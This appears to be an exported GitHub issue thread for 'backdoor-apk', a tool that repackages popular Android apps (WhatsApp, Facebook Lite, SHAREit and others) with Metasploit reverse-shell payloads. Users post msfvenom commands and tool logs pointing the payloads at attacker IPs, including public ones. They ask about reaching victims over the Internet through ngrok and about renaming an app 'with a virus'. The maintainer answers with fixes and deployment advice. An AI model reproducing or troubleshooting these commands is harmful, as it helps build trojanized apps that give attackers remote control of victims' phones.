[2018-05-29 16:54] rootech1 commented on #105
how to fix this error
msfvenom -x /root/Desktop/Musixmatch.apk -p android/meterpreter/reverse_tcp LHOST=197.231.43.178 LPORT=6060 -o /root/Desktop/Musixmatchreload.apk

Using APK template: /root/Desktop/Musixmatch.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[] Creating signing key and keystore..
[]

[2018-06-01 02:21] sqers opened #136 "Connect"
Hello,
I have an issue concerning apktool in kali linux. Whenever I try to recompile without doing any changes, it gives me this error:
I: Using Apktool 2.2.2
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could no

[2018-06-03 17:33] hackiniciante commented on #90
Estou com mesmo problema [!] Failed to locate smali file to hook

[2018-06-03 17:37] hackiniciante commented on #90
Estou usando o Kali  no meu celular porém aparece esse erro na hora de usar o backdoor-apk
![screenshot_2018-06-03-14-36-10](https://user-images.githubusercontent.com/39883960/40889355-9af652ee-673b-11e8-84a5-1a0526ede905.png)

[2018-06-06 18:39] brain2terminal commented on #136
Use the current version of apktool, bro...

[2018-06-07 11:37] niles1999 opened #137 "Failed to recompile original project with backdoor"
Failed to recompile original project with backdoor

[2018-06-08 05:33] PratapAdhav opened #138 "failed to recompile original project with backdoor in kali linux"
**While recompiling the apk I got the error**

root@Pratap:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh applock.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK

[2018-06-11 04:27] RVatgit opened #139 "Failed to decompile original APK file"

[2018-06-11 04:27] #139 closed, assigned to nobody

[2018-06-15 19:17] howto5166 commented on #138
Just installed it and having the same issue.. Did someone found the solution??

[2018-06-17 06:25] prizoner627 commented on #138
same here :(

[2018-06-17 08:38] prizoner627 commented on #138
root@kali:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh WhatsApp.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP

[2018-06-17 09:32] prizoner627 opened #140 "[!] Failed to recompile original project with backdoor"
root@kali:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh cc.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK

[2018-06-19 08:22] Morteda opened #141 "Failed to recompile original project with backdoor"
Failed to recompile original project with backdoor how can solved it plz
😐
Apktool the last version 2.3.3

[2018-06-19 18:32] Morteda commented on #141
No answer 😐

[2018-06-21 12:05] loveablefellow007 commented on #118
Can u tell about this error

On Fri, Apr 20, 2018, 12:36 PM Stewarddeng <notifications@github.com> wrote:

[2018-06-23 20:50] Dylan433447 commented on #134
same here

[2018-06-24 02:56] mechaadi commented on #134
Hey, @Dylan433447 try this
#10033

[2018-06-24 02:57] mechaadi commented on #134
Hey try this #10033

#10033

[2018-06-24 02:57] #134 closed, assigned to nobody

[2018-06-26 22:17] V3rB0se commented on #78
@dana-at-cp @dana-at-cp @dana-at-cp @dana-at-cp @dana-at-cp

[2018-06-30 13:06] shreyasbadachi opened #142 "unable to find hookpoint of applock.apk"
root@Hacker:~/Desktop# msfvenom -x applock-2-6-7.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.25 LPORT=4444 -o applockloded.apk
Using APK template: applock-2-6-7.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompi

[2018-06-30 13:37] GameonRoki commented on #95
Sir am struck in Unable to find a hook point /tmp/d20180630-2334-ak3cth/original/smali*/ClientApplicationSplittedShell.smali

someone please resolve this

[2018-07-01 07:48] PratapAdhav commented on #138
does anyone found the answer for the error

[2018-07-06 18:57] frovaaa commented on #141
i have the same problem

[2018-07-07 10:59] a-zamani opened #143 "Necessary:Problems creating a Backdoor.apk file"
Hello.
**I know that I have to put it in "TheFatRat", but the problem is not "natural"!
The problem is your software**

When I'm creating a "backdoor" file for Android
After choosing Hook 5 Fat, it does not get the "backdoor" file and it does not fix it!
The steps I take:

    [05] Backdooring Original apk [Instagram, Line,etc] .
    I use "NGROK" for "LPORT" and "LHOST".
    Path : /root/Desktop/

[2018-07-08 06:08] kamru commented on #95
i was trying to compile cclean.apk when i got this message :
[!] Failed to add hook

[2018-07-08 06:10] kamru commented on #77
i was trying to compile cclean.apk when i got this message :
[!] Failed to add hook

[2018-07-08 17:50] a-zamani commented on #143
**Help Me Please**

[2018-07-17 19:08] steve01101 opened #144 "backdoor-apk error "Failed to add hook""
`1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 52.14.61.47
[?] Please enter an LPORT value: 18120
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an

[2018-07-18 04:29] rameshdevalla commented on #51
Failed to build the apk after hooking and it saying it was protected apk

[2018-07-18 04:30] rameshdevalla commented on #144
This is the biggest problem in this tool did you got the solution

[2018-07-18 16:54] steve01101 commented on #144
I have version 2.3.1 of apktool, I do not understand why it does not work. what is the hook?

[2018-07-18 17:11] steve01101 commented on #144
I have version 2.3.1 of apktool, I do not understand why it does not work. what is the hook?

[2018-07-18 17:42] rameshdevalla commented on #144
Hook means a file which gives connection between you and victim

[2018-07-18 17:42] rameshdevalla commented on #144
For reverse connection

[2018-07-19 10:45] steve01101 commented on #144
I solved by changing apk, but now there is another problem "Failed to recompile original project with backdoor"

[2018-07-19 10:48] rameshdevalla commented on #144
Use evil-droid v ll get an backdoor apk without any flaws its pretty much bro I'm using that

[2018-07-19 11:15] steve01101 commented on #144
ok thanks I can use evil-droid with msfconsole? and ngrok?

[2018-07-19 11:16] rameshdevalla commented on #144
Yeah bro u can use

On Thu, Jul 19, 2018, 4:45 PM steve01101 <notifications@github.com> wrote:

[2018-07-19 11:41] steve01101 commented on #144
are you serious? an error with evil-droid "Failed to verify signed artifacts"

[2018-07-19 11:44] steve01101 commented on #144
I would like to use backdoor-apk. if someone knows how to fix my problem with backdoor-apk I will thank him

[2018-07-21 08:00] chanda1998 commented on #134
where to add this #10033

[2018-07-24 08:28] mechaadi commented on #134
https://github.com/rapid7/metasploit-framework/issues/10033

[2018-07-24 12:59] dumbevil opened #145 "Failed to run proguard with specified configuration"
I am getting this error, please help.

[*] Running backdoor-apk.sh v0.2.3 on Tue Jul 24 05:38:13 PDT 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.0.108
[?] Please ente

[2018-07-27 15:43] beurre28 opened #146 "2 errors launch backdoor-apk"
Hello Boy,

I hope you are well !
I have problem with your script.
I send you my problem in attachment, it will be clearer.

Thx advance,
Antho.

![backdoor-apk-principal error](https://user-images.githubusercontent.com/41798101/43330816-9191579a-91c4-11e8-8226-94c610fcac92.PNG)
![backdoor-apk-line 239](https://user-images.githubusercontent.com/41798101/43330826-961f114e-91c4-11e8-8ca3-a4f1890ede1

[2018-07-30 20:47] NaheelSalman commented on #95
./backdoor_apk: line 107: [: too many arguments
done.
 [!] Failed to add hook
![screenshot from 2018-07-30 16-46-29](https://user-images.githubusercontent.com/39267623/43422610-3e062eba-9418-11e8-80df-714319b5c936.png)

[2018-08-02 07:51] TryHard3r opened #147 "Failed to decompile original APK file"
Hello, guy！
When I run your script，the terminal display "**Failed to decompile original APK file**".
I have tried multiple apk files，the result is the same.
Maybe I need your help

[2018-08-03 19:32] mrkaraly opened #148 "About the tool"
Your tool is **Fucked up**  , fix it ###

[2018-08-08 06:14] new125 commented on #51
[!] Failed to recompile original project with backdoor

still me getting this error is this solved?? can anyone help

[2018-08-13 16:57] zSolitario opened #149 "Deepin Couldn't find: dex2jar"
Hi, I'm in deepin, I tried to install dex2jar by apt-get only that I do not find the packages so I downloaded it like this on https://github.com/dana-at-cp/backdoor-apk/issues/103 and even though changing the location to dex2jar / d2j-dex2jar.sh of the error that was not found (they are in the same folder)

[2018-08-13 23:24] #149 closed, assigned to nobody

[2018-08-21 22:33] devilankur18 commented on #147
@VisualLine I have also faced this. I got it working by follow the directory as per shown in the README, Also the apk should be in script directory.

[2018-08-27 13:32] littleheary opened #150 "[!] Failed to decompile original APK file"
[!] Failed to decompile original APK file
how to solve this?

[2018-08-27 15:23] Thehere opened #151 "Apktool error"
[!] Check your environment and configuration. Couldn't find: apktool

[2018-08-29 12:39] mrkaraly commented on #148
Sorry dude, but I figured out why I can't use the tool, your tool using some libraries that don't work on the 32-bit systems, so you should write in the description that your tool doesn't work on 32-bit systems, and thanks.

[2018-09-01 06:08] deltadroid opened #152 "using it over WAN"
can it be used over WAN along with ngrok?
I tried couple of times but the meterpreter sessions are not captured. is there any way?

[2018-09-01 08:15] sajinstalin01 commented on #105
same issue

[2018-09-16 18:00] ahmeesalaar12 commented on #105
lport=6060 "-o " -0

On Sat, Sep 1, 2018 at 1:15 AM sajinstalin01 <notifications@github.com>
wrote:

[2018-09-18 11:28] sanjeevpk commented on #150
Same error I am also facing, could you please let us know how to resolve this issue. I have installed apktool and zipalign but still facing the issue even for a smaller kb apks.

[2018-09-20 00:57] fedi966 commented on #105
any one have a solution???

[2018-09-20 01:54] fedi966 commented on #133
the same problem any solution?

[2018-09-24 19:28] #151 closed, assigned to nobody

[2018-09-24 19:28] #148 closed, assigned to nobody

[2018-09-24 19:39] #136 closed, assigned to nobody

[2018-09-24 19:48] dana-at-cp commented on #150
@littleheary @sanjeevpk Depends on the APK. Apktool doesn't work on every APK but it should work on most APKs that come from the legit Google Play Store.

[2018-09-26 23:03] mohammadrezza opened #153 "Failed to sign recompiled APK"
jar signer says unable to open jar file , what should i do ?

[2018-09-27 15:36] glenn2148 commented on #141
i have seen this on many forums and no one has come to a complete and reliable fix,i have tryed everything suggested in all forums and no progress in fixing it, backdoor-apk needs to be taken down.

[2018-09-27 16:22] glenn2148 commented on #75
looks like it never came, lol

[2018-09-27 16:27] fedi966 commented on #133
any advices??
Le 27 sept. 2018 5:22 PM, "glenn2148" <notifications@github.com> a écrit :

[2018-09-27 19:46] dana-at-cp commented on #153
@mohammadrezza anything interesting in run.log?

[2018-09-27 19:47] dana-at-cp commented on #147
@TryHard3r Move the APK file into the same directory as the backdoor-apk.sh script.

[2018-09-27 19:47] #147 closed, assigned to nobody

[2018-09-27 19:48] dana-at-cp commented on #145
@dumbevil Proguard is going away in the next release.

[2018-09-27 19:48] #145 closed, assigned to nobody

[2018-09-27 19:49] dana-at-cp commented on #146
@beurre28 Your environment is not setup correctly.

[2018-09-27 19:49] #146 closed, assigned to nobody

[2018-09-27 19:50] dana-at-cp commented on #133
@grimmpotter @fedi966 @glenn2148 Hooking logic is different in the next release. I may have it pushed out later today or later this week.

[2018-09-27 20:01] dana-at-cp commented on #144
@steve01101 @rameshdevalla A new release is coming soon that resolves a number of issues.

[2018-09-27 20:02] dana-at-cp commented on #143
@a-zamani I can't support TheFatRat. With that said, a new release of backdoor-apk is coming soon.

[2018-09-27 20:04] dana-at-cp commented on #142
@shreyasbadachi Haha! I originally didn't notice that you submitted an issue for msfvenom. I don't support the Metasploit project directly. Try the rapid7/Metasploit github repos.

[2018-09-27 20:06] dana-at-cp commented on #135
@tobgy Apktool doesn't work with every APK out there. As a test, you can decompile and recompile an APK using Apktool on it's own and if it doesn't work then it won't work with backdoor-apk. :)

[2018-09-27 20:22] dana-at-cp commented on #78
Root issue is fixed in Apktool.

[2018-09-27 20:23] dana-at-cp commented on #133
Should be fixed in 0.2.4.

[2018-09-27 20:23] #133 closed, assigned to dana-at-cp

[2018-09-27 20:24] #135 closed, assigned to nobody

[2018-09-27 20:35] waleed99100 opened #154 "solved! common error with backdoor-apk"
hello as i tired i'm running kali64 i fixed my problem one after another and i want to share knowledge fixing common problem

firstly open terminal and type the following commands
to install java jdk
`apt-get install jdk 10`
apktool last
`apt-get install apktool`
lib64 witch required
`sudo apt-get install lib32zl lib32ncurses5 lib32stdc++6`
"field to recompile original project with apktool"
by ins

[2018-09-27 20:41] waleed99100 commented on #150
i solved most problems in new issues up check it

[2018-09-27 20:45] waleed99100 commented on #141
check  new issues i solved common problems

[2018-09-27 21:29] dana-at-cp commented on #154
@waleed99100 Apktool is required and so are the 32/64 bit libraries. The zipalign tool is included as a third-party dependency. A recent version of a JDK is required as well to do the signing after recompilation.

FYI. The output of backdoor-apk and entries in run.log should have given you some clues.

Sorry you had so much trouble.

On a side note, version 0.2.4 was just committed minutes ago.

[2018-09-27 21:29] #154 closed, assigned to nobody

[2018-09-27 21:31] dana-at-cp commented on #153
@mohammadrezza FYI. The script depends on some directories included in the project. If you move the backdoor-apk.sh script to some new location it will break a lot of things.

[2018-09-27 21:32] dana-at-cp commented on #137
@niles1999 Please try verson 0.2.4.

[2018-09-27 21:32] #137 closed, assigned to nobody

[2018-09-27 21:34] dana-at-cp commented on #138
@PratapAdhav Have you tried to use Apktool on the APK file as a smoke test? Simply decompile the APK and attempt to recompile with Apktool. If the recompilation fails with Apktool alone then that's the problem.

[2018-09-27 21:34] #138 closed, assigned to nobody

[2018-09-27 21:35] dana-at-cp commented on #140
@prizoner627 There's no information. Which APK? Output of run.log?

[2018-09-27 21:35] #140 closed, assigned to nobody

[2018-09-27 21:38] dana-at-cp commented on #141
@Morteda @dravid3x @glenn2148 @waleed99100 Many of these types of issues are a result of Apktool not being able to recompile the original APK. As a quick test, use Apktool to decompile and recompile the APK. If Apktool fails then the issue is with the APK and/or Apktool. If Apktool decompiles/recompiles the APK successfully then there may be an issue within backdoor-apk.sh.

[2018-09-27 21:38] #141 closed, assigned to nobody

[2018-09-27 21:40] #142 closed, assigned to nobody

[2018-09-27 21:40] #143 closed, assigned to nobody

[2018-09-27 21:42] dana-at-cp commented on #144
@steve01101 @rameshdevalla Please try version 0.2.4 and let me know if the problem persists.

[2018-09-27 21:43] dana-at-cp commented on #150
@littleheary Try to decompile the APK using Apktool alone. If it fails then you found the root cause. :)

[2018-09-27 21:45] dana-at-cp commented on #152
@deltadroid I don't know much about ngrok but I have tested android/meterpreter/reverse_https payloads over the Internet/WAN that were created as part of backdoor-apk.sh.

[2018-09-28 10:29] mohammadrezza commented on #153
the ending lines of run.log is:
`Value of from_date_str: 2012/09/19 07:35:
Value of validity: 30000
jarsigner: unable to open jar file: /root/Downloads/backdoor-apk/backdoor-apk/original/dist/../../SHAREit_3.5.48_Android.apk
Forcing cleanup due to a failure or error state!
`
i ran this command :
`root@kali-arm64:~/Downloads/backdoor-apk/backdoor-apk# sudo ./backdoor-apk.sh ../../SHAREit_3.5.48_And

[2018-09-28 15:05] dana-at-cp commented on #153
@mohammadrezza This is a very simple bug but as a workaround move the APK file to the same directory as the backdoor-apk.sh script.

[2018-09-28 17:22] dana-at-cp commented on #153
@mohammadrezza This is fixed in version 0.2.4a.

[2018-09-28 17:25] #153 closed, assigned to dana-at-cp

[2018-09-28 18:25] dana-at-cp commented on #144
@steve01101 @rameshdevalla This should be fixed in versions 0.2.4 and 0.2.4a. Please reopen a new issue if you encounter the same problem.

[2018-09-28 18:25] #144 closed, assigned to nobody

[2018-09-28 18:26] #150 closed, assigned to nobody

[2018-09-28 18:34] dana-at-cp commented on #152
@deltadroid Version 0.2.3 had issues with more recent versions of Metasploit/msfvenom. All of those issues have been resolved in versions 0.2.4 and 0.2.4a. I would try to use ngrok again with the latest version of backdoor-apk.

Also, it wouldn't hurt to do initial tests on a LAN and WAN without ngrok before retesting over the Internet with ngrok.

[2018-09-28 18:34] #152 closed, assigned to nobody

[2018-09-29 16:21] glenn2148 commented on #133
fantastic work dana-at-cp, first time in 6 weeks i have completed a job, thanks
Question:can you rename an apk after you have installed the back door without destroying it???

[2018-09-30 16:51] glenn2148 opened #155 "Questions"
1, after i have recompiled a new version with a virus, can it be renamed and still work as designed??

2: If running backdoor-apk on a program fails, and i imeadatly run it again (same commands) and it runs with  no problems will it be ok???  (i have done this several times but not tested either program)

thanks

[2018-10-01 15:57] dana-at-cp commented on #155
Answers below:

1. You can rename the repackaged APK file with no issue or loss in functionality. If you are talking about changing the name of the application displayed after the APK is installed then there is much more involved and much more that can go wrong.

2. If you observed this behavior on version 0.2.3 then it is likely that the issue(s) is resolved in version 0.2.4a. If you are seeing t

[2018-10-03 14:11] #155 closed, assigned to dana-at-cp

[2018-10-07 15:20] RFHACKE opened #156 "when using backdoor-apk to backdoor facebook_lite.apk a error comes saying"
when using backdoor-apk to backdoor facebook_lite.apk a error comes saying:failed to locate smali file to hook

[2018-10-07 15:22] RFHACKE commented on #156
failed to locate smali file to hook

[2018-10-07 15:22] RFHACKE commented on #156
please replay fast

[2018-10-07 16:57] empt1xo commented on #156
same issue as https://github.com/dana-at-cp/backdoor-apk/issues/75

[2018-10-08 05:21] EliasHridoy opened #157 "Failed to recompile original project with backdoor"
Backdoor-apk unable to recompile many apk like "Share it" , "MX Player" etc. I tried all the possible way but it is not generating apk fiel

[2018-10-08 15:49] empt1xo commented on #75
seems like they forgot to fix this 🤔, lol

[2018-10-09 13:30] dana-at-cp commented on #156
@RFHACKE Did the APK originate from the Google Play Store?

[2018-10-09 13:35] dana-at-cp commented on #157
@EliasHridoy Was the APK sourced from the Google Play Store?

[2018-10-11 03:20] EliasHridoy commented on #157
No they are not from Google play store ? I downloaded them from a web site

[2018-10-12 05:49] abdu1aziz commented on #157
I've got the same problem. I'm downloading the apk from multiple different sources and end up with same issue at the end.
Everything seems to be going perfect until this step.
*[!] Failed to recompile original project with backdoor*

[2018-10-13 04:25] almasvhora77 opened #158 "Error : Failed to locate smali file to hook"
Still getting error in 0.2.4a
error: Failed to locate smali file to hook while merging backdoor with original apks
tried with many apps; but same error everytime

[2018-10-13 05:05] jamesbow2 commented on #157
I have been getting the same problem too. Apks downloaded are from Apkmirror.com, even after decompling and recompiling the Apks with Apktool. Are there any guidelines or list of Apks that the backdoor will compile with?

[2018-10-13 16:30] almasvhora77 commented on #156
same issue with me
failed to find smali to hook

[2018-10-14 09:43] moonwolf63x opened #159 "[!] Failed to recompile original project with backdoor"
________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /____

[2018-10-14 10:23] zhangmax94 commented on #157
the same issues happened to me  ,no other special errors but it

[2018-10-14 13:54] zhangmax94 opened #160 "i have recompiled successfully"
first of all  ,i have to say that i was failed to rebuild the app hooked with backdoor,
but at last ,i solved it .

             the flowing steps are :

                    step one:  i used the backdoor-apk  to decompile and hook original smali .
                      step two :    l used an app named apk-tool which runs on android  to
                                           recomplie the ori

[2018-10-15 09:51] #160 closed, assigned to nobody

[2018-10-17 22:10] italiangrubber commented on #159
Same problem here! I've kali linux on x64

[2018-10-18 16:02] RFHACKE commented on #156
no it did not originate from play store

[2018-10-18 16:03] RFHACKE commented on #156
wait.it is not only giving this error with facebook lite etc apk.it is giving this error with all the apks.please fix this fast

[2018-10-18 16:15] RFHACKE commented on #156
________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /____

[2018-10-18 16:16] RFHACKE commented on #156
replay fast.i request you to fix these error.please fix them

[2018-10-20 14:06] omidcrfx opened #161 "Failed to run dx on Java class files"
[*] Running backdoor-apk.sh v0.2.4a on Sat Oct 19 09:51:01 EDT 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 127.0.0.1
[?] Please enter an LPORT value: 4444
[+] Android manifes

[2018-10-22 21:33] dana-at-cp commented on #161
@omidcrfx You basically gave no information. Share how you are running backdoor-apk.sh and the full run.log file after the failure.

[2018-10-22 21:38] dana-at-cp commented on #159
@moonwolf63x @italiangrubber All recompilation issues involve Apktool. Have you tried to decompile/recompile the APKs in question using Apktool on it's own? That's the best place to start when you first face a recompilation issue. If Apktool can't decompile/recompile the APK then that is the root cause.

[2018-10-22 21:40] dana-at-cp commented on #158
@almasvhora77 Have you tried the APK files in the third-party/APKs folder?

[2018-10-22 21:42] dana-at-cp commented on #157
@jamesbow2  Are you stating that Apktool is able to decompile/recompile the APK but it somehow fails when used as part of backdoor-apk?

[2018-10-22 21:44] dana-at-cp commented on #157
@EliasHridoy @abdu1aziz @jamesbow2 @zhangmax94 Have you tried the APK files that are in the third-party/APKs folder?

[2018-10-22 21:45] dana-at-cp commented on #156
@RFHACKE @empt1xo @almasvhora77 Have you tried the APK files included in the third-party/APKs folder?

[2018-10-23 16:01] empt1xo commented on #156
@dana-at-cp yeah i still get the same error.

[2018-10-23 16:56] dana-at-cp commented on #156
@empt1xo That is very strange and doesn't make much sense. Can you share the relevant run.log file?

[2018-10-24 09:43] jamesbow2 commented on #157
Yes, using Apktool to decompile and recompile is fine, but it fails when used with backdoor-apk. Have not tried the APKs folder, will do, thank you.

[2018-11-02 04:38] EliasHridoy commented on #157
@dana-at-cp same result. I tried many  time.

          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||___

[2018-11-02 10:54] empt1xo commented on #157
same issue in here :/

[2018-11-04 20:07] Naeemk10 commented on #138
ple dana-at-cp how solv this error .....? ple help

[2018-11-04 20:08] Naeemk10 commented on #138
Ahmhty Rat same error >> decomplier feaild .using this error how to fix

[2018-12-09 04:51] zhangmax94 commented on #157
everything is ok ,the reason for  recompiling failed is that the apktool version installed through apt-get is not suitable. just download apktool and apktool.jar from its official website .

[2018-12-09 11:36] WiredLife opened #162 "please include MainActivity"
Please include this:
``
        <activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>"``
from the payload Android

[2018-12-09 11:42] WiredLife commented on #159
1. replace the kali apktool with this
https://ibotpeaches.github.io/Apktool/install/
2. run
apktool empty-framework-dir
./cleanup.sh
3. run
./backdoor-apk.sh host.apk
4. must work ;)

[2018-12-10 09:16] kali2525 opened #163 "Opération failed : 1"
Hi everybody
I use backdoor to merge payload in apk game the build done and the session done
But the problèm when i use command i get (Opération failed : 1)
What i do ?

[2018-12-10 14:27] WiredLife commented on #163
No needed permission/s granted
go to the app permissions in android an check the needed permission/s

[2018-12-10 16:34] kali2525 commented on #163
@WiredLife
Itried to transfer the permission from the payload AndroidManifest.xml file  to original but the application did not work when I returned it to the original form

[2018-12-20 10:00] ghost opened #164 "install failed"
hello i want install your script in kali nethunter termux android but i have one error.

[*] Running backdoor-apk.sh v0.2.4a on Thu Dec 20 09:48:04 UTC 2018
[!] Check your environment and configuration. Couldn't find: baksmali

Thanks for your help

[2018-12-30 07:38] dsx12 opened #165 "[!] Failed to recompile original apk project with backdoor"
The scripts functions worked fine until the recompiling function was called it exited with the error:

"[!] Failed to recompile original apk project with backdoor"

I have noticed there are some current bugs with apktool going around on most debian operating systems.

Is there a method to configure this script to run on windows? I tried injecting metasploit payloads into my original apk on windows

[2018-12-30 07:42] dsx12 commented on #159
@WiredLife  I replaced the apktool with latest version (2.3.4-1) and still doesn't work :/... Any fix?

[2018-12-30 07:46] dsx12 commented on #159
Is there a alternative tool other than apktool to rebuild decompiled apks that successfully works?

[2018-12-30 07:49] dsx12 commented on #165
Is there a alternative tool other than apktool to rebuild decompiled apks that successfully works?

[2019-01-03 10:52] ashish111821 commented on #164
I'm also having the same problem

[2019-01-06 14:54] fipso commented on #164
Hey,
u can get baksmali here -> https://github.com/JesusFreke/smali/
just download the jar and the the script from here https://github.com/JesusFreke/smali/blob/master/scripts/baksmali and add the script to PATH

[2019-01-07 08:13] ghost commented on #164
ok thanks

[2019-01-07 10:46] ghost commented on #164
hello fipso please give me the step because no work.
├─[~/backdoor-apk-master/backdoor-apk]           └─[$] ls                                         Calculette.apk       cleanup.sh  run.log         META-INF             com         smali-master    backdoor-apk.sh      java        third-party     baksmali-2.2.5.jar   javax                       baksmali.properties  org

[*] Running backdoor-apk.sh

[2019-01-07 11:08] ashish111821 commented on #164
Try updating and upgrading termux

[2019-01-07 11:09] ashish111821 commented on #164
Pkg upgrade

[2019-01-08 07:06] MQ-03 commented on #138
root@Pratap:~/backdoor-apk/backdoor-apk# ./backdoor-apk.sh applock.apk
________
/ ______
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||||||| AAA AAA PPP PPP KKK KKK
|| _ o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||||||| AAA AAA PPP KKK KKK
|||| AAA AAA PPP KKK KKK
/
________||_____________________________________
/____________
|____________| Dana James Traversie

[*] Ru

[2019-01-09 04:15] McCreamy commented on #164
Help fipso, how do i install baksmali???

[2019-01-09 04:15] McCreamy commented on #164
how do i install it ???

[2019-01-12 04:10] stevanuscolonne commented on #157
@zhangmax94 many thanks for pointing towards the right direction.. For me the problem is apktool.jar, after replacing the apktool.jar recompiling success.

[2019-01-12 04:12] stevanuscolonne commented on #165
@dsx12 try to replace apktool.jar file from its official website. I've tried and recompile succes.

[2019-01-17 17:11] adityaponukupati commented on #105
root@aditya:~/Desktop# msfvenom -x '/root/Desktop/facebook_lite_v129.0.0.10.99.apk' -p android/meterpreter/reverse_https LHOST=192.168.0.6 LPORT=8080 -o facebook.apk
Using APK template: /root/Desktop/facebook_lite_v129.0.0.10.99.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signi

[2019-02-08 18:48] MircoCagni opened #166 "Failed to recompile original project with backdoor"
root@vmi239688:~/Documents/backdoor-apk/backdoor-apk# ./backdoor-apk.sh AppLock_v2.6.8_apkpure.com.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_|

[2019-02-09 17:24] EliasHridoy commented on #157
@zhangmax94 Can you please explain the things. How to replace apktool.jar . Because I already replace apktool.jar in /usr/share/apktool directory. But my problem is not solved yet

[2019-02-10 13:32] Arifulislambisal commented on #159
________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /____

[2019-02-22 01:51] Alicheer opened #167 "Failed to recompile original project with backdoor"
[
[run.log](https://github.com/dana-at-cp/backdoor-apk/files/2892077/run.log)
](url)

[2019-02-27 19:59] aungsoehein opened #168 "[!] Failed to recompile original"
./backdoor-apk.sh AdobeReader.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||

[2019-02-28 01:30] Sufiyan0335 commented on #164
Same problem how to install baksmali???

[2019-02-28 13:02] Sufiyan0335 commented on #164
How to install it??

[2019-03-02 06:25] Sufiyan0335 commented on #164
I think this method is work for you

Try this
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/

[2019-03-10 14:24] scr1k commented on #165
@stevanuscolonne
could u tell me where should i replace?

[2019-03-14 08:18] threst commented on #165
